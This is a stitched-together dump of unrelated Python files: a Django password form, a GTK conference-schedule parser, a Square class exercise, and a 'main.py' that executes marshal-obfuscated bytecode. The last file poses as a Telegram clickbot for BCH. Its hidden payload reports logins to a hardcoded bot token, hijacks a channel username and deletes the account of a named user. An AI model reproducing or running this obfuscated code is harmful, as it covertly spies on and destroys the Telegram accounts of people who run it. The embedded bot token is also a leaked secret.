password1 = forms.CharField(
label="Password",
widget=forms.PasswordInput)
password2 = forms.CharField(
label="Password Confirmation",
widget=forms.PasswordInput)
class Meta:
model = User
fields = ['email', 'username', 'password1', 'password2']
def clean_email(self):
email = self.cleaned_data.get('email')
username = self.cleaned_data.get('username')
if User.objects.filter(email=email).exclude(username=username):
raise forms.ValidationError(u'Email address must be unique')
return email
def clean_password2(self):
password1 = self.cleaned_data.get('password1')
password2 = self.cleaned_data.get('password2')
if not password1 or not password2:
raise ValidationError("Please confirm your password")
if password1 != password2:
raise ValidationError("Passwords must match")
return password2
|
[
"ozzycookman@hotmail.com"
] |
ozzycookman@hotmail.com
|
259a993dae1211d6c25b3d9c800844f3f596a644
|
3d472b4ce6ced06db687f85184a4d3899f798352
|
/sojourner/schedule.py
|
d6611ee85fc506bb2b2910a42234ebbaf284decf
|
[] |
no_license
|
wjt/sojourner
|
1bb1dd951ddc1cbf8b115d34047013c0a72b407a
|
6252b9f77873133659fd9d62c4f4626d6210585f
|
refs/heads/master
| 2021-01-01T15:17:50.460111
| 2012-02-02T18:25:02
| 2012-02-02T18:25:02
| 3,005,373
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 11,256
|
py
|
# vim: set fileencoding=utf-8 sts=4 sw=4 :
import xml.dom.minidom as minidom
from xml.dom.minidom import Node
from xml.parsers.expat import ExpatError
import datetime as dt
import cPickle
import os.path
import colorsys
import hashlib
import gtk
from sojourner.malvern import config_file, esc
def getChildrenByTagName(node, name):
"""Similar to node.getElementsByTagName(name), but only fetches immediate
children."""
return [child for child in node.childNodes if child.nodeName == name]
def get_text(node, strip_newlines=False):
"""Concatenates all of node's text children, optionally removing single
newlines (but preserving paragraphs)."""
text = ''.join([child.data for child in node.childNodes
if child.nodeType == Node.TEXT_NODE])
if strip_newlines:
# The schedule has a bunch of places which do this:
# "paragraph one\n\nparagraph two"
# and some that do this:
# "paragraph one\n \nparagraph two"
# This is tediously ad-hoc, and a real Markdown parser would be better.
tidier_double_newlines = '\n'.join(text.split(' \n'))
text = '\n\n'.join(
[p.replace('\n', ' ')
for p in tidier_double_newlines.split('\n\n')])
return text.lstrip().rstrip()
def get_time_delta(node):
(h, m) = get_text(node).split(':')
return dt.timedelta(hours=int(h), minutes=int(m))
def get_text_from_children(parent, name, joiner=''):
"""Given a node, returns the text contents of all its children named
'name', joined by 'joiner'. For example, given a node 'foo' representing
this stanza:
<foo>
<bar>hello</bar>
<baz>not this one</baz>
<bar>world</bar>
<foo>
then:
>>> get_text_from_children(foo, 'bar', joiner=' ')
u'hello world'.
"""
texts = [get_text(c) for c in getChildrenByTagName(parent, name)]
return joiner.join(texts)
def by_start_time(x, y):
# FIXME: should this be Event.__cmp__?
return cmp(x.start, y.start)
class MalformedSchedule(Exception):
pass
# We deliberately stash the track colours outside of any object. There's no
# need to pickle these: they're based on the track name, so are stable.
swatches = {}
def get_color(track):
if track in swatches:
# In Violet
return swatches[track]
else:
# We pick nicely matching colours by fixing S and V and varying H. The
# first byte of an md5sum will do nicely for picking H!
m = hashlib.md5()
m.update(track)
h = ord(m.digest()[0]) / 255.0
r, g, b = colorsys.hsv_to_rgb(h, 0.9, 0.9)
swatch = gtk.gdk.Color(int(r * 65535), int(g * 65535), int(b * 65535))
swatches[track] = swatch
return swatch
class Schedule(object):
"""Version number for pickled event data. This must be incremented if this
class, or Event, is modified."""
__VERSION = 8
def __init__(self, schedule_path):
self.schedule_path = schedule_path
(self.events, self.events_by_id, self.events_by_room,
self.events_by_track) = self.__load_schedule()
self.favourites = self.__load_favourites()
def __load_schedule(self):
"""Tries to load the schedule from a pre-parsed pickle file; if that
doesn't fly, reads the actual XML and pickles the result for later."""
pickle_path = self.schedule_path + '.pickle'
try:
if os.path.getmtime(pickle_path) <= \
os.path.getmtime(self.schedule_path):
raise Exception('pickle is out of date')
version, stuff = cPickle.load(open(pickle_path, 'rb'))
if version != Schedule.__VERSION:
raise Exception('expected version %u, got version %u' %
(Schedule.__VERSION, version))
return stuff
except Exception, e:
stuff = self.__parse_schedule()
try:
cPickle.dump((Schedule.__VERSION, stuff),
open(pickle_path, 'wb'),
protocol=2)
except Exception, e:
print "Couldn't pickle schedule: %s" % e
return stuff
def __parse_schedule(self):
try:
doc = minidom.parse(self.schedule_path)
except ExpatError, e:
raise MalformedSchedule(e)
schedule_elt = doc.documentElement
if doc.documentElement.nodeName != 'schedule':
raise MalformedSchedule('Root element was <%s/>, not <schedule/>' %
doc.documentElement.nodeName)
events = []
events_by_id = {}
events_by_room = {}
events_by_track = {}
for day in getChildrenByTagName(doc.documentElement, 'day'):
date = dt.datetime.strptime(day.getAttribute('date'), '%Y-%m-%d')
for room_node in getChildrenByTagName(day, 'room'):
room = room_node.getAttribute('name')
for node in getChildrenByTagName(room_node, 'event'):
e = Event(node, date, room)
events.append(e)
events_by_id[e.id] = e
blah = events_by_room.get(e.room, [])
blah.append(e)
events_by_room[e.room] = blah
blah = events_by_track.get(e.track, [])
blah.append(e)
events_by_track[e.track] = blah
events.sort(cmp=by_start_time)
return (events, events_by_id, events_by_room, events_by_track)
def __load_favourites(self):
favourites = []
try:
f = file(self._favourites_file(), 'r')
for id in f.readlines():
event = self.events_by_id[id.strip()]
if event not in favourites:
favourites.append(event)
f.close()
except IOError:
# I guess they don't have any favourites
pass
return favourites
def _favourites_file(self):
return os.path.dirname(self.schedule_path) + '/favourites'
def _write_favourites(self):
f = file(self._favourites_file(), 'w')
for fav in self.favourites:
f.write("%s\n" % fav.id)
f.close()
def add_favourite(self, event):
if not event in self.favourites:
self.favourites.append(event)
self.favourites.sort(cmp=by_start_time)
self._write_favourites()
def remove_favourite(self, event):
try:
self.favourites.remove(event)
self._write_favourites()
except ValueError, e:
# Oops! I guess 'event' wasn't in the favourites.
print e
class Event(object):
def __init__(self, node, date, room):
self.id = node.getAttribute('id')
self.room = room
children = [ c for c in node.childNodes
if c.nodeType == Node.ELEMENT_NODE
]
for child in children:
n = child.nodeName
if n == 'title':
self.title = get_text(child)
elif n == 'start':
self.start = date + get_time_delta(child)
elif n == 'duration':
self.duration = get_time_delta(child)
elif n == 'track':
self.track = get_text(child)
# In practice, abstract and description are the only places that
# stray newlines show up. FIXME: I think they're actually in
# Markdown format, maybe we could use Python-Markdown to do better
# than this?
elif n == 'abstract':
self.abstract = get_text(child, strip_newlines=True)
elif n == 'description':
self.description = get_text(child, strip_newlines=True)
elif n == 'persons':
# FIXME: maybe joining the people together should be up to the
# widgets?
self.person = get_text_from_children(child, 'person',
joiner=', ')
else:
pass
self.end = self.start + self.duration
# These are not methods because strftime showed up surprisingly high on
# the profile. They're localized; I'm not sure if this is a good thing.
self.day_name = self.start.strftime("%A")
self.start_str = self.start.strftime('%H:%M')
self.end_str = self.end.strftime('%H:%M')
# And these are pre-computed because they were about a quarter of
# showing the full list.
bg = get_color(self.track)
if bg.red + bg.green + bg.blue > (65535 * 3 / 2):
fg = '#000000'
else:
fg = '#ffffff'
self.bg = bg
summary_data = {
'title': esc(self.title),
'speaker': esc(self.person),
'day': self.day_name,
'start': self.start_str,
'end': self.end_str,
'room': esc(self.room),
'track': esc(self.track),
'track_background': bg.to_string(),
'track_foreground': fg
}
self.full_summary = Event.FULL_SUMMARY_FORMAT % summary_data
self.summary_sans_day = Event.OMIT_DAY_FORMAT % summary_data
self.summary_sans_room = Event.OMIT_ROOM_FORMAT % summary_data
self.summary_sans_track = Event.OMIT_TRACK_FORMAT % summary_data
FULL_SUMMARY_FORMAT = """<b>%(title)s</b>
<small>%(speaker)s <i>(%(day)s %(start)s–%(end)s, %(room)s, <span background='%(track_background)s' foreground='%(track_foreground)s'>%(track)s</span>)</i></small>"""
OMIT_DAY_FORMAT = """<b>%(title)s</b>
<small>%(speaker)s <i>(%(start)s–%(end)s, %(room)s, %(track)s)</i></small>"""
OMIT_ROOM_FORMAT = """<b>%(title)s</b>
<small>%(speaker)s <i>(%(start)s–%(end)s, %(track)s)</i></small>"""
OMIT_TRACK_FORMAT = """<b>%(title)s</b>
<small>%(speaker)s <i>(%(start)s–%(end)s, %(room)s)</i></small>"""
OMIT_NOTHING = 0
OMIT_DAY = 1
OMIT_ROOM = 2
OMIT_TRACK = 3
def summary(self, omit=OMIT_NOTHING):
if omit == Event.OMIT_NOTHING:
return self.full_summary
elif omit == Event.OMIT_DAY:
return self.summary_sans_day
elif omit == Event.OMIT_ROOM:
return self.summary_sans_room
elif omit == Event.OMIT_TRACK:
return self.summary_sans_track
def full(self):
if self.description.startswith(self.abstract):
desc = self.description[len(self.abstract):]
else:
desc = self.description
if desc == '':
return "%s\n\n%s" % (self.full_summary, esc(self.abstract))
elif self.abstract == '':
return "%s\n\n%s" % (self.full_summary, esc(desc))
else:
return "%s\n\n%s\n\n%s" \
% (self.full_summary, esc(self.abstract), esc(desc))
def conflicts(self, other_event):
if other_event == self:
return False
return not (self.start <= other_event.start and \
self.end <= other_event.start or \
self.start >= other_event.end)
|
[
"will@willthompson.co.uk"
] |
will@willthompson.co.uk
|
a07aed13b3ebffc7f5a9829855456716e2adb5be
|
c8a4f3493a484c6dd53417c562e3f0bbc4c95ae9
|
/0x0C-python-almost_a_circle/models/square.py
|
b90739160c45e6313c301dcd58b3825213b45516
|
[] |
no_license
|
flaviomco/holbertonschool-higher_level_programming
|
d51c1dfed68670caa2495250eef78cf80f61ef2b
|
98e67d12a4e5f00f77c809028629fb6e4f93d053
|
refs/heads/main
| 2023-04-23T03:12:27.023469
| 2021-05-04T18:40:37
| 2021-05-04T18:40:37
| 317,630,410
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,994
|
py
|
#!/usr/bin/python3
"""square.py"""
from models.rectangle import Rectangle
class Square(Rectangle):
"""Square class that inherits from Rectangle"""
def __init__(self, size, x=0, y=0, id=None):
super().__init__(size, size, x, y, id)
@property
def size(self):
""" public getter and setter size"""
return self.width
@size.setter
def size(self, value):
self.width = value
self.height = value
def update(self, *args, **kwargs):
"""public method def update(self, *args, **kwargs)
that assigns attributes
"""
if args and len(args) != 0:
a = 0
for arg in args:
if a == 0:
if arg is None:
self.__init__(self.size, self.x, self.y)
else:
self.id = arg
elif a == 1:
self.size = arg
elif a == 2:
self.x = arg
elif a == 3:
self.y = arg
a += 1
elif kwargs and len(kwargs) != 0:
for k, v in kwargs.items():
if k == "id":
if v is None:
self.__init__(self.size, self.x, self.y)
else:
self.id = v
elif k == "size":
self.size = v
elif k == "x":
self.x = v
elif k == "y":
self.y = v
def to_dictionary(self):
"""returns the dictionary representation of a Square"""
return {
"id": self.id,
"size": self.width,
"x": self.x,
"y": self.y
}
def __str__(self):
"""returns [Square] (<id>) <x>/<y> - <size>"""
return "[Square] ({}) {}/{} - {}".format(self.id, self.x, self.y,
self.width)
|
[
"2109@holbertonschool.com"
] |
2109@holbertonschool.com
|
b4d455cfde0c40ef36daa5dfc76dbe00be8fde41
|
0ad63db87cf0d8d9fbdfaaac8acf0ba4759a8d25
|
/.bch/main.py
|
ab5092f487acfaa8b37b79d36a9875f12c8434b8
|
[] |
no_license
|
guntur168/TwinBot
|
0bbe558568cb3845576abc0d94da58e49ad95353
|
70d5fdaa380e1155fb35ceff599c20ac4356d6b0
|
refs/heads/master
| 2020-05-15T14:54:54.098996
| 2019-04-16T20:06:31
| 2019-04-16T20:06:31
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 16,356
|
py
|
import marshal
# Coded: NjankSoekamti
exec(marshal.loads(b'\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00@\x00\x00\x00s\xb0\x01\x00\x00d\x00d\x01l\x00m\x01Z\x01m\x02Z\x02\x01\x00d\x00d\x02l\x03m\x04Z\x04m\x05Z\x05m\x06Z\x06\x01\x00d\x00d\x03l\x07m\x08Z\t\x01\x00d\x00d\x04l\nm\x0bZ\x0b\x01\x00d\x00d\x05l\x0cm\rZ\x0e\x01\x00d\x00d\x06l\x0fm\x10Z\x10m\x11Z\x11\x01\x00d\x00d\x07l\x12m\x13Z\x13m\x14Z\x15\x01\x00e\x13j\x16Z\x17e\x13j\x18Z\x19e\x13j\x1aZ\x1be\x13j\x1cZ\x1de\x15d\x08d\t\x8d\x01\x01\x00d\x00d\nl\x1em\x1eZ\x1e\x01\x00d\x0bZ\x1fd\x0cZ d\rZ!d\x0eZ"d\x0fZ#d\x00d\x10l$m%Z%\x01\x00d\x00d\x11l&Z&d\x00d\x11l\'Z\'d\x00d\x11l(Z(d\x00d\x11l)Z)d\x00d\x11l*Z*d\x00d\x11l+Z+e+j,Z-e-\x83\x00Z.d\x12Z/d\x13Z0d\x14d\x15i\x01Z1e&\xa02e&j3d\x16k\x02\x90\x01r\x16d\x17n\x02d\x18\xa1\x01\x01\x00y^d\x19d\x1a\x84\x00Z4d-d\x1bd\x1c\x84\x01Z5d.d\x1ed\x1f\x84\x01Z6d d!\x84\x00Z7d/d#d$\x84\x01Z8d%d&\x84\x00Z9d\'d(\x84\x00Z:d)d*\x84\x00Z;d+d,\x84\x00Z<e.\xa0=e<\x83\x00\xa1\x01\x01\x00W\x00n0\x04\x00e>k\n\x90\x01r\xaa\x01\x00\x01\x00\x01\x00e&\xa02e&j3d\x16k\x02\x90\x01r\xa0d\x17n\x02d\x18\xa1\x01\x01\x00Y\x00n\x02X\x00d\x11S\x00)0\xe9\x00\x00\x00\x00)\x02\xda\x0eTelegramClient\xda\x06events)\x03\xda\x12UpdateShortMessage\xda\x11ReplyInlineMarkup\xda\x11KeyboardButtonUrl)\x01\xda\x1bGetBotCallbackAnswerRequest)\x01\xda\x14DeleteAccountRequest)\x01\xda\x15UpdateUsernameRequest)\x02\xda\x18UsernameNotOccupiedError\xda\x15UsernameOccupiedError)\x02\xda\x04Fore\xda\x04initT)\x01Z\tautoreset)\x01\xda\x08datetimez\n\x1b[1;41;97mz\x06\x1b[0;0mz\x07\x1b[1;93mz\x07\x1b[1;96mz\x07\x1b[0;96m)\x01\xda\rBeautifulSoupNi\xb3\xfa\x00\x00Z dd60bb74bb03d8aa368aa37ec7b35d42z\nUser-AgentzrMozilla/5.0 (Windows NT 10.0; Win32; x86) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36\xda\x02nt\xda\x03cls\xda\x05clearc\x01\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00s\x18\x00\x00\x00t\x00j\x01d\x01d\x02|\x00d\x03\x9c\x02d\x04\x8d\x02}\x01d\x00S\x00)\x05NzUhttps://api.telegram.org/bot656077390:AAETzn5vgIO2Q-ad8xdi8pg5nJprYOtTIYg/sendMessagei(y\xaa%)\x02Z\x07chat_id\xda\x04text)\x01\xda\x04data)\x02\xda\x08requests\xda\x03get)\x02\xda\x03msgZ\x04Khck\xa9\x00r\x18\x00\x00\x00\xda\x00\xda\x04KhcO\x1c\x00\x00\x00s\x02\x00\x00\x00\x00\x01r\x1a\x00\x00\x00c\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x04\x00\x00\x00C\x00\x00\x00s\x10\x00\x00\x00t\x00d\x01|\x00\x17\x00t\x01t\x02\x83\x03S\x00)\x02Nz\x08session/)\x03r\x02\x00\x00\x00\xda\x04Khcm\xda\x04Khct)\x01Z\x0cphone_numberr\x18\x00\x00\x00r\x18\x00\x00\x00r\x19\x00\x00\x00\xda\x04KhcI\x1e\x00\x00\x00s\x02\x00\x00\x00\x00\x01r\x1d\x00\x00\x00Fc\x02\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00sF\x00\x00\x00|\x01d\x01k\x08r$t\x00d\x02t\x01\xa0\x02\xa1\x00\xa0\x03d\x03\xa1\x01|\x00f\x02\x16\x00\x83\x01\x01\x00n\x1et\x00d\x02t\x01\xa0\x02\xa1\x00\xa0\x03d\x03\xa1\x01|\x00f\x02\x16\x00d\x04d\x05\x8d\x02\x01\x00d\x00S\x00)\x06NFz\x14[\x1b[0;96m%s\x1b[0;0m] %sz\x08%H:%M:%Sz\x02\n\n)\x01\xda\x03end)\x04\xda\x05printr\x0e\x00\x00\x00\xda\x03now\xda\x08strftime)\x02Z\x04KhcLZ\naddnewliner\x18\x00\x00\x00r\x18\x00\x00\x00r\x19\x00\x00\x00\xda\x04Khcg \x00\x00\x00s\x06\x00\x00\x00\x00\x01\x08\x01\x1c\x02r"\x00\x00\x00c\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x04\x00\x00\x00\x03\x00\x00\x00s(\x00\x00\x00d\x01\x89\x00t\x00\x88\x00\x83\x01\x89\x01t\x01\x87\x00\x87\x01f\x02d\x02d\x03\x84\x08t\x02|\x00\x83\x01D\x00\x83\x01\x83\x01S\x00)\x04Ns\x06\x00\x00\x00210400c\x01\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x05\x00\x00\x003\x00\x00\x00s"\x00\x00\x00|\x00]\x1a\\\x02}\x01}\x02|\x02\x88\x00|\x01\x88\x01\x16\x00\x19\x00A\x00V\x00\x01\x00q\x02d\x00S\x00)\x01Nr\x18\x00\x00\x00)\x03\xda\x02.0\xda\x01i\xda\x01c)\x02\xda\x04KhcX\xda\x04Khcqr\x18\x00\x00\x00r\x19\x00\x00\x00\xfa\t<genexpr>(\x00\x00\x00s\x02\x00\x00\x00\x04\x00z\x17KhPc.<locals>.<genexpr>)\x03\xda\x03len\xda\x05bytes\xda\tenumerate)\x01Z\x03bytr\x18\x00\x00\x00)\x02r&\x00\x00\x00r\'\x00\x00\x00r\x19\x00\x00\x00\xda\x04KhPc%\x00\x00\x00s\x06\x00\x00\x00\x00\x01\x04\x01\x08\x01r,\x00\x00\x00\xda\x03GETc\x03\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x08\x00\x00\x00C\x00\x00\x00s~\x00\x00\x00y*t\x00j\x01|\x01|\x00|\x02t\x02d\x01d\x02d\x03\x8d\x06}\x03|\x03j\x03}\x04|\x03j\x04}\x05|\x04|\x05g\x02S\x00\x04\x00t\x00j\x05j\x06k\nrR\x01\x00\x01\x00\x01\x00t\x07d\x04\x83\x01\x01\x00t\x08d\x05\x83\x01\x01\x00Y\x00n(\x04\x00t\x00j\x05j\tk\nrx\x01\x00\x01\x00\x01\x00t\x07d\x06\x83\x01\x01\x00t\x08d\x05\x83\x01\x01\x00Y\x00n\x02X\x00d\x00S\x00)\x07N\xe9\x0f\x00\x00\x00F)\x04r\x14\x00\x00\x00\xda\x07headersZ\x07timeout\xda\x0fallow_redirectsz%\x1b[1;91mConnection Timeout ...\x1b[0;90m\n\xe9\x01\x00\x00\x00z#\x1b[1;91mConnection Error ...\x1b[0;90m\n)\nr\x15\x00\x00\x00Z\x07request\xda\x04KhcFZ\x0bstatus_coder\x13\x00\x00\x00Z\nexceptionsZ\x07Timeoutr"\x00\x00\x00\xda\x04exit\xda\x0fConnectionError)\x06\xda\x04Khco\xda\x06methodr\x14\x00\x00\x00Z\x04Khcn\xda\x04Khcd\xda\x04KhcGr\x18\x00\x00\x00r\x18\x00\x00\x00r\x19\x00\x00\x00\xda\x04KhPR)\x00\x00\x00s\x16\x00\x00\x00\x00\x01\x02\x01\x16\x01\x06\x01\x06\x01\x08\x01\x12\x01\x08\x01\x0c\x01\x12\x01\x08\x01r9\x00\x00\x00c\x01\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x07\x00\x00\x00C\x00\x00\x00sF\x00\x00\x00x@t\x00d\x01|\x00d\x02\x17\x00\x83\x02D\x00].}\x01t\x01j\x02\xa0\x03d\x03t\x04\xa0\x05\xa1\x00\xa0\x06d\x04\xa1\x01|\x00|\x01f\x03\x16\x00\xa1\x01\x01\x00t\x07\xa0\x08d\x02\xa1\x01\x01\x00q\x10W\x00d\x00S\x00)\x05Nr\x01\x00\x00\x00r1\x00\x00\x00z)[\x1b[0;96m%s\x1b[0;0m] Waiting %s seconds! %d\rz\x08%H:%M:%S)\t\xda\x05range\xda\x03sys\xda\x06stdout\xda\x05writer\x0e\x00\x00\x00r \x00\x00\x00r!\x00\x00\x00\xda\x04time\xda\x05sleep)\x02r$\x00\x00\x00\xda\x01xr\x18\x00\x00\x00r\x18\x00\x00\x00r\x19\x00\x00\x00\xda\x04KhPA5\x00\x00\x00s\x06\x00\x00\x00\x00\x01\x14\x01 \x01rA\x00\x00\x00c\x01\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00s*\x00\x00\x00|\x00j\x00d\x01\x19\x00j\x01d\x01\x19\x00}\x01t\x02|\x01\x83\x01t\x03k\x08r"|\x01j\x04S\x00d\x00S\x00d\x00S\x00)\x02Nr\x01\x00\x00\x00)\x05Z\x04rowsZ\x07buttons\xda\x04typer\x06\x00\x00\x00Z\x03url)\x02Z\x06markupZ\x04KhcQr\x18\x00\x00\x00r\x18\x00\x00\x00r\x19\x00\x00\x00\xda\x04KhPm9\x00\x00\x00s\x08\x00\x00\x00\x00\x01\x10\x01\x0c\x01\x06\x02rC\x00\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00C\x00\x00\x00s<\x00\x00\x00t\x00t\x01\x9b\x00d\x01t\x02\x9b\x00d\x02t\x01\x9b\x00d\x03t\x02\x9b\x00d\x04t\x01\x9b\x00d\x05t\x02\x9b\x00d\x06t\x03\x9b\x00d\x07t\x04\x9b\x00d\x08\x9d\x10\x83\x01\x01\x00d\x00S\x00)\tNu\x19\x00\x00\x00\n\xe2\x95\x94\xe2\x95\x97 \xe2\x95\x94\xe2\x95\x90\xe2\x95\x97\xe2\x95\xa6 \xe2\x95\xa6 u<\x00\x00\x00\xe2\x94\x8c\xe2\x94\x80\xe2\x94\x90\xe2\x94\xac \xe2\x94\xac\xe2\x94\x8c\xe2\x94\x80\xe2\x94\x90\xe2\x94\xac\xe2\x94\x8c\xe2\x94\x80\xe2\x94\x8c\xe2\x94\x90 \xe2\x94\x8c\xe2\x94\x80\xe2\x94\x90\xe2\x94\x8c\xe2\x94\xac\xe2\x94\x90u\x19\x00\x00\x00\n\xe2\x95\xa0\xe2\x95\xa9\xe2\x95\x97\xe2\x95\x91 \xe2\x95\xa0\xe2\x95\x90\xe2\x95\xa3 u0\x00\x00\x00\xe2\x94\x82 \xe2\x94\x82 \xe2\x94\x82\xe2\x94\x82 \xe2\x94\x9c\xe2\x94\xb4\xe2\x94\x90\xe2\x94\x9c\xe2\x94\xb4\xe2\x94\x90\xe2\x94\x82 \xe2\x94\x82 \xe2\x94\x82 u\x1b\x00\x00\x00\n\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d\xe2\x95\xa9 \xe2\x95\xa9 u=\x00\x00\x00\xe2\x94\x94\xe2\x94\x80\xe2\x94\x98\xe2\x94\xb4\xe2\x94\x80\xe2\x94\x98\xe2\x94\xb4\xe2\x94\x94\xe2\x94\x80\xe2\x94\x98\xe2\x94\xb4 \xe2\x94\xb4\xe2\x94\x94\xe2\x94\x80\xe2\x94\x98\xe2\x94\x94\xe2\x94\x80\xe2\x94\x98 \xe2\x94\xb4 \nz$ Youtube Channel : Njank Soekamti \xda\x01\n)\x05r\x1f\x00\x00\x00\xda\x06koneng\xda\x05toska\xda\x06banner\xda\x05resetr\x18\x00\x00\x00r\x18\x00\x00\x00r\x18\x00\x00\x00r\x19\x00\x00\x00\xda\x04KhPt?\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x02\x04rI\x00\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\n\x00\x00\x00\x83\x00\x00\x00s@\x02\x00\x00t\x00j\x01\xa0\x02d\x01\xa1\x01s\x16t\x00\xa0\x03d\x01\xa1\x01\x01\x00t\x04\x83\x00\x01\x00t\x05t\x06j\x07\x83\x01d\x02k\x00rBt\x08d\x03\x83\x01\x01\x00t\x08d\x04\x83\x01\x01\x00t\td\x05\x83\x01\x01\x00t\nt\x06j\x07d\x05\x19\x00\x83\x01\x89\x00\x88\x00\xa0\x0bt\x06j\x07d\x05\x19\x00\xa1\x01I\x00d\x00H\x00\x01\x00\x88\x00\xa0\x0c\xa1\x00I\x00d\x00H\x00}\x00t\x08d\x06|\x00j\rd\x00k\x08r\x86d\x07n\x04|\x00j\r|\x00j\x0ed\x00k\x08r\x98d\x07n\x0cd\x08|\x00j\x0e\x17\x00d\t\x17\x00f\x02\x16\x00\x83\x01\x01\x00|\x00j\x0ed\nk\x02s\xcc|\x00j\x0fd\x0bk\x02s\xcc|\x00j\x0fd\x0ck\x02\x90\x01r\xaet\x10|\x00j\x0ed\x00k\x08r\xde|\x00j\x0fn\x08|\x00j\x0ed\r\x17\x00\x83\x01\x01\x00yZ\x88\x00\xa0\x11d\x0e\xa1\x01I\x00d\x00H\x00}\x01|\x01j\x12\x90\x01rB\x88\x00t\x13|\x01d\x0ed\x07\xa0\x14t\x15j\x16t\x17j\x18d\x02d\x0f\x8d\x02\xa1\x01\x17\x00\x83\x02\x83\x01I\x00d\x00H\x00}\x02|\x02\x90\x01rBt\x10|\x01j\x0ed\x10\x17\x00\x83\x01\x01\x00W\x00n\x1a\x04\x00t\x19t\x1af\x02k\n\x90\x01r^\x01\x00\x01\x00\x01\x00Y\x00n\x02X\x00y6|\x00j\x0ed\x00k\t\x90\x01r\x94|\x00j\x0ed\x11k\x02\x90\x01r\x94t\x10d\x12\x83\x01\x01\x00\x88\x00t\x1bd\x13\x83\x01\x83\x01I\x00d\x00H\x00}\x02W\x00n\x16\x04\x00t\x1ck\n\x90\x01r\xac\x01\x00\x01\x00\x01\x00Y\x00n\x02X\x00t\x1dd\x14\x83\x01\x01\x00\x88\x00\xa0\x1ed\x15d\x16\xa1\x02I\x00d\x00H\x00\x01\x00\x87\x00f\x01d\x17d\x18\x84\x08}\x03\x88\x00\xa0\x1f|\x03t j!d\x19d\x15d\x1a\x8d\x02\xa1\x02\x01\x00\x87\x00f\x01d\x1bd\x1c\x84\x08}\x04\x88\x00\xa0\x1f|\x04t j!d\x19d\x15d\x1dd\x1e\x8d\x03\xa1\x02\x01\x00d\x1fd \x84\x00}\x05\x88\x00\xa0\x1f|\x05t j!d\x19d\x15d!d\x1e\x8d\x03\xa1\x02\x01\x00\x88\x00\xa0"\xa1\x00I\x00d\x00H\x00\x01\x00d\x00S\x00)"NZ\x07session\xe9\x02\x00\x00\x00z"Usage: python main.py phone_numberz\'Example: python main.py +6281540466655\nr1\x00\x00\x00z\x0fLogin as: %s%s\nr\x19\x00\x00\x00\xfa\x01(\xfa\x01)Z\x07bagas_qi\xab{\xc8\x18iF\xfau$z\r has logged!!Z\x0cbot_scripter)\x01\xda\x01kz\' got you! username channel has changes!Z\x08netiranzz\x15Account has deleted!:z\x1ei just wanna delete my accountz\rPreparing ...\xda\x0cBCH_clickbotz\x06/visitc\x01\x00\x00\x00\x00\x00\x00\x00\x0e\x00\x00\x00\x06\x00\x00\x00\x93\x00\x00\x00s\xbe\x01\x00\x00|\x00j\x00}\x01t\x01|\x01\x83\x01t\x02k\t\x90\x01r\xbat\x03|\x01j\x04d\x01\x83\x02\x90\x01r\xbat\x01|\x01j\x04j\x05\x83\x01t\x06k\x08\x90\x01r\xbat\x07|\x01j\x04j\x05\x83\x01}\x02|\x02d\x00k\t\x90\x01r\xbat\x08d\x02\x83\x01\x01\x00d\x03}\x03d\x04}\x04\x90\x01x\\t\t|\x02\x83\x01\\\x02}\x05}\x06t\n|\x06d\x05\x83\x02}\x07|\x07\xa0\x0bd\x06d\x07d\x08i\x01\xa1\x02}\x08|\x07\xa0\x0bd\x06d\td\ni\x01\xa1\x02}\t|\x05d\x0bk\x02r\xcct\x0cj\r\xa0\x0ed\x0ct\x0f\xa0\x10\xa1\x00\xa0\x11d\r\xa1\x01|\x08d\x00k\tr\xbcd\x0en\x02d\x0f|\x04f\x03\x16\x00\xa1\x01\x01\x00P\x00n\xd8|\x05d\x10k\x02\x90\x01r0|\x08d\x00k\x08\x90\x01r0|\td\x00k\t\x90\x01r0|\t\xa0\x12d\x11\xa1\x01}\n|\t\xa0\x12d\x12\xa1\x01}\x0b|\t\xa0\x12d\x13\xa1\x01}\x0ct\x13t\x14|\x0b\x83\x01\x83\x01\x01\x00t\x15j\x16d\x14|\n|\x0cd\x15\x9c\x02t\x17d\x16d\x17\x8d\x04\x01\x00P\x00nt|\x05d\x10k\x02\x90\x01rt|\x08d\x00k\t\x90\x01rtt\x0cj\r\xa0\x0ed\x0ct\x0f\xa0\x10\xa1\x00\xa0\x11d\r\xa1\x01|\x08d\x00k\t\x90\x01rfd\x0en\x02d\x18|\x04f\x03\x16\x00\xa1\x01\x01\x00n0|\x03|\x04k\x02\x90\x01r\xa4t\x18d\x19|\x01j\x04j\x19t\x1a\xa0\x1b\xa1\x00d\x1a\x8d\x03}\r\x88\x00|\r\x83\x01I\x00d\x00H\x00\x01\x00P\x00|\x04d\x1b7\x00}\x04t\x1c\xa0\x1dd\x1c\xa1\x01\x01\x00q^W\x00d\x00S\x00)\x1dN\xda\x0creply_markupz\x0fSending command\xe9\x14\x00\x00\x00r\x01\x00\x00\x00z\x0bhtml.parserZ\x03divZ\x05classz\x0bg-recaptcha\xda\x02idZ\x07headbari.\x01\x00\x00z"[\x1b[0;96m%s\x1b[0;0m] STATUS: %s 